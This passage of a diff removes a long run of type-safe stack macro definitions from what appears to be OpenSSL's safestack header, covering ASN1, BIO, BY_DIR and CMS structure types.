-#define sk_ASN1_GENERALSTRING_push(st, val) SKM_sk_push(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_unshift(st, val) SKM_sk_unshift(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_find(st, val) SKM_sk_find(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_find_ex(st, val) SKM_sk_find_ex(ASN1_GENERALSTRING, (st), (val))
-#define sk_ASN1_GENERALSTRING_delete(st, i) SKM_sk_delete(ASN1_GENERALSTRING, (st), (i))
-#define sk_ASN1_GENERALSTRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_GENERALSTRING, (st), (ptr))
-#define sk_ASN1_GENERALSTRING_insert(st, val, i) SKM_sk_insert(ASN1_GENERALSTRING, (st), (val), (i))
-#define sk_ASN1_GENERALSTRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_GENERALSTRING, (st), (cmp))
-#define sk_ASN1_GENERALSTRING_dup(st) SKM_sk_dup(ASN1_GENERALSTRING, st)
-#define sk_ASN1_GENERALSTRING_pop_free(st, free_func) SKM_sk_pop_free(ASN1_GENERALSTRING, (st), (free_func))
-#define sk_ASN1_GENERALSTRING_shift(st) SKM_sk_shift(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_pop(st) SKM_sk_pop(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_sort(st) SKM_sk_sort(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_is_sorted(st) SKM_sk_is_sorted(ASN1_GENERALSTRING, (st))
-
-#define sk_ASN1_INTEGER_new(cmp) SKM_sk_new(ASN1_INTEGER, (cmp))
-#define sk_ASN1_INTEGER_new_null() SKM_sk_new_null(ASN1_INTEGER)
-#define sk_ASN1_INTEGER_free(st) SKM_sk_free(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_num(st) SKM_sk_num(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_value(st, i) SKM_sk_value(ASN1_INTEGER, (st), (i))
-#define sk_ASN1_INTEGER_set(st, i, val) SKM_sk_set(ASN1_INTEGER, (st), (i), (val))
-#define sk_ASN1_INTEGER_zero(st) SKM_sk_zero(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_push(st, val) SKM_sk_push(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_unshift(st, val) SKM_sk_unshift(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_find(st, val) SKM_sk_find(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_find_ex(st, val) SKM_sk_find_ex(ASN1_INTEGER, (st), (val))
-#define sk_ASN1_INTEGER_delete(st, i) SKM_sk_delete(ASN1_INTEGER, (st), (i))
-#define sk_ASN1_INTEGER_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_INTEGER, (st), (ptr))
-#define sk_ASN1_INTEGER_insert(st, val, i) SKM_sk_insert(ASN1_INTEGER, (st), (val), (i))
-#define sk_ASN1_INTEGER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_INTEGER, (st), (cmp))
-#define sk_ASN1_INTEGER_dup(st) SKM_sk_dup(ASN1_INTEGER, st)
-#define sk_ASN1_INTEGER_pop_free(st, free_func) SKM_sk_pop_free(ASN1_INTEGER, (st), (free_func))
-#define sk_ASN1_INTEGER_shift(st) SKM_sk_shift(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_pop(st) SKM_sk_pop(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_sort(st) SKM_sk_sort(ASN1_INTEGER, (st))
-#define sk_ASN1_INTEGER_is_sorted(st) SKM_sk_is_sorted(ASN1_INTEGER, (st))
-
-#define sk_ASN1_OBJECT_new(cmp) SKM_sk_new(ASN1_OBJECT, (cmp))
-#define sk_ASN1_OBJECT_new_null() SKM_sk_new_null(ASN1_OBJECT)
-#define sk_ASN1_OBJECT_free(st) SKM_sk_free(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_num(st) SKM_sk_num(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_value(st, i) SKM_sk_value(ASN1_OBJECT, (st), (i))
-#define sk_ASN1_OBJECT_set(st, i, val) SKM_sk_set(ASN1_OBJECT, (st), (i), (val))
-#define sk_ASN1_OBJECT_zero(st) SKM_sk_zero(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_push(st, val) SKM_sk_push(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_unshift(st, val) SKM_sk_unshift(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_find(st, val) SKM_sk_find(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_find_ex(st, val) SKM_sk_find_ex(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_delete(st, i) SKM_sk_delete(ASN1_OBJECT, (st), (i))
-#define sk_ASN1_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_OBJECT, (st), (ptr))
-#define sk_ASN1_OBJECT_insert(st, val, i) SKM_sk_insert(ASN1_OBJECT, (st), (val), (i))
-#define sk_ASN1_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_OBJECT, (st), (cmp))
-#define sk_ASN1_OBJECT_dup(st) SKM_sk_dup(ASN1_OBJECT, st)
-#define sk_ASN1_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(ASN1_OBJECT, (st), (free_func))
-#define sk_ASN1_OBJECT_shift(st) SKM_sk_shift(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_pop(st) SKM_sk_pop(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_sort(st) SKM_sk_sort(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_is_sorted(st) SKM_sk_is_sorted(ASN1_OBJECT, (st))
-
-#define sk_ASN1_STRING_TABLE_new(cmp) SKM_sk_new(ASN1_STRING_TABLE, (cmp))
-#define sk_ASN1_STRING_TABLE_new_null() SKM_sk_new_null(ASN1_STRING_TABLE)
-#define sk_ASN1_STRING_TABLE_free(st) SKM_sk_free(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_num(st) SKM_sk_num(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_value(st, i) SKM_sk_value(ASN1_STRING_TABLE, (st), (i))
-#define sk_ASN1_STRING_TABLE_set(st, i, val) SKM_sk_set(ASN1_STRING_TABLE, (st), (i), (val))
-#define sk_ASN1_STRING_TABLE_zero(st) SKM_sk_zero(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_push(st, val) SKM_sk_push(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_unshift(st, val) SKM_sk_unshift(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_find(st, val) SKM_sk_find(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_find_ex(st, val) SKM_sk_find_ex(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_delete(st, i) SKM_sk_delete(ASN1_STRING_TABLE, (st), (i))
-#define sk_ASN1_STRING_TABLE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_STRING_TABLE, (st), (ptr))
-#define sk_ASN1_STRING_TABLE_insert(st, val, i) SKM_sk_insert(ASN1_STRING_TABLE, (st), (val), (i))
-#define sk_ASN1_STRING_TABLE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_STRING_TABLE, (st), (cmp))
-#define sk_ASN1_STRING_TABLE_dup(st) SKM_sk_dup(ASN1_STRING_TABLE, st)
-#define sk_ASN1_STRING_TABLE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_STRING_TABLE, (st), (free_func))
-#define sk_ASN1_STRING_TABLE_shift(st) SKM_sk_shift(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_pop(st) SKM_sk_pop(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_sort(st) SKM_sk_sort(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_is_sorted(st) SKM_sk_is_sorted(ASN1_STRING_TABLE, (st))
-
-#define sk_ASN1_TYPE_new(cmp) SKM_sk_new(ASN1_TYPE, (cmp))
-#define sk_ASN1_TYPE_new_null() SKM_sk_new_null(ASN1_TYPE)
-#define sk_ASN1_TYPE_free(st) SKM_sk_free(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_num(st) SKM_sk_num(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_value(st, i) SKM_sk_value(ASN1_TYPE, (st), (i))
-#define sk_ASN1_TYPE_set(st, i, val) SKM_sk_set(ASN1_TYPE, (st), (i), (val))
-#define sk_ASN1_TYPE_zero(st) SKM_sk_zero(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_push(st, val) SKM_sk_push(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_unshift(st, val) SKM_sk_unshift(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_find(st, val) SKM_sk_find(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_find_ex(st, val) SKM_sk_find_ex(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_delete(st, i) SKM_sk_delete(ASN1_TYPE, (st), (i))
-#define sk_ASN1_TYPE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_TYPE, (st), (ptr))
-#define sk_ASN1_TYPE_insert(st, val, i) SKM_sk_insert(ASN1_TYPE, (st), (val), (i))
-#define sk_ASN1_TYPE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_TYPE, (st), (cmp))
-#define sk_ASN1_TYPE_dup(st) SKM_sk_dup(ASN1_TYPE, st)
-#define sk_ASN1_TYPE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_TYPE, (st), (free_func))
-#define sk_ASN1_TYPE_shift(st) SKM_sk_shift(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_pop(st) SKM_sk_pop(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_sort(st) SKM_sk_sort(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_is_sorted(st) SKM_sk_is_sorted(ASN1_TYPE, (st))
-
-#define sk_ASN1_UTF8STRING_new(cmp) SKM_sk_new(ASN1_UTF8STRING, (cmp))
-#define sk_ASN1_UTF8STRING_new_null() SKM_sk_new_null(ASN1_UTF8STRING)
-#define sk_ASN1_UTF8STRING_free(st) SKM_sk_free(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_num(st) SKM_sk_num(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_value(st, i) SKM_sk_value(ASN1_UTF8STRING, (st), (i))
-#define sk_ASN1_UTF8STRING_set(st, i, val) SKM_sk_set(ASN1_UTF8STRING, (st), (i), (val))
-#define sk_ASN1_UTF8STRING_zero(st) SKM_sk_zero(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_push(st, val) SKM_sk_push(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_unshift(st, val) SKM_sk_unshift(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_find(st, val) SKM_sk_find(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_find_ex(st, val) SKM_sk_find_ex(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_delete(st, i) SKM_sk_delete(ASN1_UTF8STRING, (st), (i))
-#define sk_ASN1_UTF8STRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_UTF8STRING, (st), (ptr))
-#define sk_ASN1_UTF8STRING_insert(st, val, i) SKM_sk_insert(ASN1_UTF8STRING, (st), (val), (i))
-#define sk_ASN1_UTF8STRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_UTF8STRING, (st), (cmp))
-#define sk_ASN1_UTF8STRING_dup(st) SKM_sk_dup(ASN1_UTF8STRING, st)
-#define sk_ASN1_UTF8STRING_pop_free(st, free_func) SKM_sk_pop_free(ASN1_UTF8STRING, (st), (free_func))
-#define sk_ASN1_UTF8STRING_shift(st) SKM_sk_shift(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_pop(st) SKM_sk_pop(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_sort(st) SKM_sk_sort(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_is_sorted(st) SKM_sk_is_sorted(ASN1_UTF8STRING, (st))
-
-#define sk_ASN1_VALUE_new(cmp) SKM_sk_new(ASN1_VALUE, (cmp))
-#define sk_ASN1_VALUE_new_null() SKM_sk_new_null(ASN1_VALUE)
-#define sk_ASN1_VALUE_free(st) SKM_sk_free(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_num(st) SKM_sk_num(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_value(st, i) SKM_sk_value(ASN1_VALUE, (st), (i))
-#define sk_ASN1_VALUE_set(st, i, val) SKM_sk_set(ASN1_VALUE, (st), (i), (val))
-#define sk_ASN1_VALUE_zero(st) SKM_sk_zero(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_push(st, val) SKM_sk_push(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_unshift(st, val) SKM_sk_unshift(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_find(st, val) SKM_sk_find(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_find_ex(st, val) SKM_sk_find_ex(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_delete(st, i) SKM_sk_delete(ASN1_VALUE, (st), (i))
-#define sk_ASN1_VALUE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_VALUE, (st), (ptr))
-#define sk_ASN1_VALUE_insert(st, val, i) SKM_sk_insert(ASN1_VALUE, (st), (val), (i))
-#define sk_ASN1_VALUE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_VALUE, (st), (cmp))
-#define sk_ASN1_VALUE_dup(st) SKM_sk_dup(ASN1_VALUE, st)
-#define sk_ASN1_VALUE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_VALUE, (st), (free_func))
-#define sk_ASN1_VALUE_shift(st) SKM_sk_shift(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_pop(st) SKM_sk_pop(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_sort(st) SKM_sk_sort(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_is_sorted(st) SKM_sk_is_sorted(ASN1_VALUE, (st))
-
-#define sk_BIO_new(cmp) SKM_sk_new(BIO, (cmp))
-#define sk_BIO_new_null() SKM_sk_new_null(BIO)
-#define sk_BIO_free(st) SKM_sk_free(BIO, (st))
-#define sk_BIO_num(st) SKM_sk_num(BIO, (st))
-#define sk_BIO_value(st, i) SKM_sk_value(BIO, (st), (i))
-#define sk_BIO_set(st, i, val) SKM_sk_set(BIO, (st), (i), (val))
-#define sk_BIO_zero(st) SKM_sk_zero(BIO, (st))
-#define sk_BIO_push(st, val) SKM_sk_push(BIO, (st), (val))
-#define sk_BIO_unshift(st, val) SKM_sk_unshift(BIO, (st), (val))
-#define sk_BIO_find(st, val) SKM_sk_find(BIO, (st), (val))
-#define sk_BIO_find_ex(st, val) SKM_sk_find_ex(BIO, (st), (val))
-#define sk_BIO_delete(st, i) SKM_sk_delete(BIO, (st), (i))
-#define sk_BIO_delete_ptr(st, ptr) SKM_sk_delete_ptr(BIO, (st), (ptr))
-#define sk_BIO_insert(st, val, i) SKM_sk_insert(BIO, (st), (val), (i))
-#define sk_BIO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BIO, (st), (cmp))
-#define sk_BIO_dup(st) SKM_sk_dup(BIO, st)
-#define sk_BIO_pop_free(st, free_func) SKM_sk_pop_free(BIO, (st), (free_func))
-#define sk_BIO_shift(st) SKM_sk_shift(BIO, (st))
-#define sk_BIO_pop(st) SKM_sk_pop(BIO, (st))
-#define sk_BIO_sort(st) SKM_sk_sort(BIO, (st))
-#define sk_BIO_is_sorted(st) SKM_sk_is_sorted(BIO, (st))
-
-#define sk_BY_DIR_ENTRY_new(cmp) SKM_sk_new(BY_DIR_ENTRY, (cmp))
-#define sk_BY_DIR_ENTRY_new_null() SKM_sk_new_null(BY_DIR_ENTRY)
-#define sk_BY_DIR_ENTRY_free(st) SKM_sk_free(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_num(st) SKM_sk_num(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_value(st, i) SKM_sk_value(BY_DIR_ENTRY, (st), (i))
-#define sk_BY_DIR_ENTRY_set(st, i, val) SKM_sk_set(BY_DIR_ENTRY, (st), (i), (val))
-#define sk_BY_DIR_ENTRY_zero(st) SKM_sk_zero(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_push(st, val) SKM_sk_push(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_unshift(st, val) SKM_sk_unshift(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_find(st, val) SKM_sk_find(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_find_ex(st, val) SKM_sk_find_ex(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_delete(st, i) SKM_sk_delete(BY_DIR_ENTRY, (st), (i))
-#define sk_BY_DIR_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(BY_DIR_ENTRY, (st), (ptr))
-#define sk_BY_DIR_ENTRY_insert(st, val, i) SKM_sk_insert(BY_DIR_ENTRY, (st), (val), (i))
-#define sk_BY_DIR_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BY_DIR_ENTRY, (st), (cmp))
-#define sk_BY_DIR_ENTRY_dup(st) SKM_sk_dup(BY_DIR_ENTRY, st)
-#define sk_BY_DIR_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(BY_DIR_ENTRY, (st), (free_func))
-#define sk_BY_DIR_ENTRY_shift(st) SKM_sk_shift(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_pop(st) SKM_sk_pop(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_sort(st) SKM_sk_sort(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_is_sorted(st) SKM_sk_is_sorted(BY_DIR_ENTRY, (st))
-
-#define sk_BY_DIR_HASH_new(cmp) SKM_sk_new(BY_DIR_HASH, (cmp))
-#define sk_BY_DIR_HASH_new_null() SKM_sk_new_null(BY_DIR_HASH)
-#define sk_BY_DIR_HASH_free(st) SKM_sk_free(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_num(st) SKM_sk_num(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_value(st, i) SKM_sk_value(BY_DIR_HASH, (st), (i))
-#define sk_BY_DIR_HASH_set(st, i, val) SKM_sk_set(BY_DIR_HASH, (st), (i), (val))
-#define sk_BY_DIR_HASH_zero(st) SKM_sk_zero(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_push(st, val) SKM_sk_push(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_unshift(st, val) SKM_sk_unshift(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_find(st, val) SKM_sk_find(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_find_ex(st, val) SKM_sk_find_ex(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_delete(st, i) SKM_sk_delete(BY_DIR_HASH, (st), (i))
-#define sk_BY_DIR_HASH_delete_ptr(st, ptr) SKM_sk_delete_ptr(BY_DIR_HASH, (st), (ptr))
-#define sk_BY_DIR_HASH_insert(st, val, i) SKM_sk_insert(BY_DIR_HASH, (st), (val), (i))
-#define sk_BY_DIR_HASH_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BY_DIR_HASH, (st), (cmp))
-#define sk_BY_DIR_HASH_dup(st) SKM_sk_dup(BY_DIR_HASH, st)
-#define sk_BY_DIR_HASH_pop_free(st, free_func) SKM_sk_pop_free(BY_DIR_HASH, (st), (free_func))
-#define sk_BY_DIR_HASH_shift(st) SKM_sk_shift(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_pop(st) SKM_sk_pop(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_sort(st) SKM_sk_sort(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_is_sorted(st) SKM_sk_is_sorted(BY_DIR_HASH, (st))
-
-#define sk_CMS_CertificateChoices_new(cmp) SKM_sk_new(CMS_CertificateChoices, (cmp))
-#define sk_CMS_CertificateChoices_new_null() SKM_sk_new_null(CMS_CertificateChoices)
-#define sk_CMS_CertificateChoices_free(st) SKM_sk_free(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_num(st) SKM_sk_num(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_value(st, i) SKM_sk_value(CMS_CertificateChoices, (st), (i))
-#define sk_CMS_CertificateChoices_set(st, i, val) SKM_sk_set(CMS_CertificateChoices, (st), (i), (val))
-#define sk_CMS_CertificateChoices_zero(st) SKM_sk_zero(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_push(st, val) SKM_sk_push(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_unshift(st, val) SKM_sk_unshift(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_find(st, val) SKM_sk_find(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_find_ex(st, val) SKM_sk_find_ex(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_delete(st, i) SKM_sk_delete(CMS_CertificateChoices, (st), (i))
-#define sk_CMS_CertificateChoices_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_CertificateChoices, (st), (ptr))
-#define sk_CMS_CertificateChoices_insert(st, val, i) SKM_sk_insert(CMS_CertificateChoices, (st), (val), (i))
-#define sk_CMS_CertificateChoices_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_CertificateChoices, (st), (cmp))
-#define sk_CMS_CertificateChoices_dup(st) SKM_sk_dup(CMS_CertificateChoices, st)
-#define sk_CMS_CertificateChoices_pop_free(st, free_func) SKM_sk_pop_free(CMS_CertificateChoices, (st), (free_func))
-#define sk_CMS_CertificateChoices_shift(st) SKM_sk_shift(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_pop(st) SKM_sk_pop(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_sort(st) SKM_sk_sort(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_is_sorted(st) SKM_sk_is_sorted(CMS_CertificateChoices, (st))
-
-#define sk_CMS_RecipientInfo_new(cmp) SKM_sk_new(CMS_RecipientInfo, (cmp))
-#define sk_CMS_RecipientInfo_new_null() SKM_sk_new_null(CMS_RecipientInfo)
-#define sk_CMS_RecipientInfo_free(st) SKM_sk_free(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_num(st) SKM_sk_num(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_value(st, i) SKM_sk_value(CMS_RecipientInfo, (st), (i))
-#define sk_CMS_RecipientInfo_set(st, i, val) SKM_sk_set(CMS_RecipientInfo, (st), (i), (val))
-#define sk_CMS_RecipientInfo_zero(st) SKM_sk_zero(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_push(st, val) SKM_sk_push(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_unshift(st, val) SKM_sk_unshift(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_find(st, val) SKM_sk_find(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_find_ex(st, val) SKM_sk_find_ex(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_delete(st, i) SKM_sk_delete(CMS_RecipientInfo, (st), (i))
-#define sk_CMS_RecipientInfo_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RecipientInfo, (st), (ptr))
-#define sk_CMS_RecipientInfo_insert(st, val, i) SKM_sk_insert(CMS_RecipientInfo, (st), (val), (i))
-#define sk_CMS_RecipientInfo_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RecipientInfo, (st), (cmp))
-#define sk_CMS_RecipientInfo_dup(st) SKM_sk_dup(CMS_RecipientInfo, st)
-#define sk_CMS_RecipientInfo_pop_free(st, free_func) SKM_sk_pop_free(CMS_RecipientInfo, (st), (free_func))
-#define sk_CMS_RecipientInfo_shift(st) SKM_sk_shift(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_pop(st) SKM_sk_pop(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_sort(st) SKM_sk_sort(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_is_sorted(st) SKM_sk_is_sorted(CMS_RecipientInfo, (st))
-
-#define sk_CMS_RevocationInfoChoice_new(cmp) SKM_sk_new(CMS_RevocationInfoChoice, (cmp))
-#define sk_CMS_RevocationInfoChoice_new_null() SKM_sk_new_null(CMS_RevocationInfoChoice)
-#define sk_CMS_RevocationInfoChoice_free(st) SKM_sk_free(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_num(st) SKM_sk_num(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_value(st, i) SKM_sk_value(CMS_RevocationInfoChoice, (st), (i))
-#define sk_CMS_RevocationInfoChoice_set(st, i, val) SKM_sk_set(CMS_RevocationInfoChoice, (st), (i), (val))
-#define sk_CMS_RevocationInfoChoice_zero(st) SKM_sk_zero(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_push(st, val) SKM_sk_push(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_unshift(st, val) SKM_sk_unshift(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_find(st, val) SKM_sk_find(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_find_ex(st, val) SKM_sk_find_ex(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_delete(st, i) SKM_sk_delete(CMS_RevocationInfoChoice, (st), (i))
-#define sk_CMS_RevocationInfoChoice_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RevocationInfoChoice, (st), (ptr))
-#define sk_CMS_RevocationInfoChoice_insert(st, val, i) SKM_sk_insert(CMS_RevocationInfoChoice, (st), (val), (i))
-#define sk_CMS_RevocationInfoChoice_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RevocationInfoChoice, (st), (cmp))
-#define sk_CMS_RevocationInfoChoice_dup(st) SKM_sk_dup(CMS_RevocationInfoChoice, st)
-#define sk_CMS_RevocationInfoChoice_pop_free(st, free_func) SKM_sk_pop_free(CMS_RevocationInfoChoice, (st), (free_func))
-#define sk_CMS_RevocationInfoChoice_shift(st) SKM_sk_shift(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_pop(st) SKM_sk_pop(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_sort(st) SKM_sk_sort(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_is_sorted(st) SKM_sk_is_sorted(CMS_RevocationInfoChoice, (st))
-
-#define sk_CMS_SignerInfo_new(cmp) SKM_sk_new(CMS_SignerInfo, (cmp))
-#define sk_CMS_SignerInfo_new_null() SKM_sk_new_null(CMS_SignerInfo)
-#define sk_CMS_SignerInfo_free(st) SKM_sk_free(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_num(st) SKM_sk_num(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_value(st, i) SKM_sk_value(CMS_SignerInfo, (st), (i))
-#define sk_CMS_SignerInfo_set(st, i, val) SKM_sk_set(CMS_SignerInfo, (st), (i), (val))
-#define sk_CMS_SignerInfo_zero(st) SKM_sk_zero(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_push(st, val) SKM_sk_push(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_unshift(st, val) SKM_sk_unshift(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_find(st, val) SKM_sk_find(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_find_ex(st, val) SKM_sk_find_ex(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_delete(st, i) SKM_sk_delete(CMS_SignerInfo, (st), (i))
-#define sk_CMS_SignerInfo_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_SignerInfo, (st), (ptr))
-#define sk_CMS_SignerInfo_insert(st, val, i) SKM_sk_insert(CMS_SignerInfo, (st), (val), (i))
-#define sk_CMS_SignerInfo_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_SignerInfo, (st), (cmp))
-#define sk_CMS_SignerInfo_dup(st) SKM_sk_dup(CMS_SignerInfo, st)
-#define sk_CMS_SignerInfo_pop_free(st, free_func) SKM_sk_pop_free(CMS_SignerInfo, (st), (free_func))
-#define sk_CMS_SignerInfo_shift(st) SKM_sk_shift(CMS_SignerInfo, (st))
